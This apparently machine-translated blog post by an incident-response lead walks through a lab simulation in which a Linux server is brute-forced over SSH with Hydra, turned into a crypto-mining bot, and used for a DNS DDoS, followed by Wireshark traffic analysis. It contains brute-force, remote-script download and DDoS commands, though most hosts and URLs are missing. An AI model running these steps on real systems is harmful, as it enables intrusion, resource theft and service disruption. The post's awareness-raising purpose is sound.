simulate the attack process of mining hacker

Posted by barello at 2020-04-03

Author: cherishao (leader of the emergency response team of Xin'an Road)

In the blink of an eye, the first half of 2018 passed like this. In the work of the first half of 2018, the most common security event is that the server or the office host is remotely controlled as a chicken to mine for profits or carry out DDoS attacks on other websites. Today, share how to use the conventional SSH weak password of Linux to blow up Linux The server is also used for mining and DDoS attacks on other websites. The analysis process of attacks is relatively simple. If there is any discomfort, please correct it.

Experimental environment

The source code and domain name of the Linux server used and the site built are as follows:

Linux: Kali  2.0


Website deployment source code: discuzx.7z

Deployment tool: phpstudy

Website Domain:

The tools used are as follows:

SSH blasting: hydra-8.1-windows

Remote terminal management: X term

Analysis tool: Wireshark

Website building

Download discuzx source code on the Internet, use phpstudy to quickly build a station, put the source code in its www directory, and start it (read the document).

Domain name binding

Bind your own IP address to your registered domain name and add the resolution record:

Attack process

Use security tools to attack the designated platform server (the server provides common network services, such as web services, terminal services, etc.). The attack process is designed as follows:

SSH blasting

By analyzing and scanning the server of the target site (IP address:, it is found that the server opens the ssh22 port and the operating system type is Linux.

Use Hydra for SSH blasting to obtain server permission:

Hydra - l root - P Dictionary - V ssh://

The (root / 123456) obtained by brute force cracking enters the server:

After connecting to the server, run the script to get the remote mining program. Server current status:

Mining with server

Get installation script

wget --no-check-certificate -O

Execute script to start mining

Sudo bash 10014 ා this ID can be replaced with your own user ID

CPU status of server mining (CPU soared to 96%):

DDoS attack

Use this server to attack (website: cherishao. Com) DDoS.

Get DDoS shell from C2 server


DDoS attack on the site  -dns -timeout 1 - num 1000

Site uptime status:

Website status after DDoS attack:

Analysis of communication characteristic flow

Packet capturing analysis with Wireshark

Mining data flow analysis

From the above communication data flow, we can find the wallet address used by the miner:




Xig proxy feature

DDoS data flow analysis

Through analysis, we found a large number of DNS request packets for website:

Summary and related attachments


In recent years, there are many new ways to invade the system, such as Apache Struts2 vulnerability exploitation and Hadoop yarn rest API unauthorized vulnerability exploitation. However, the old SSH brute force attack methods are not dead, but increasingly fierce.

Through such a simple design, this paper mainly wants to convey: first, hacker has obtained the authority of our system, and he can do many things, such as information stealing, data destruction, external attack and many other things that are not good for us. In daily work and life, please pay more attention to password protection strategy and strengthen their own security awareness.

Related accessories

Https:// password: mp3l

Reference link

SSH brute force cracking trend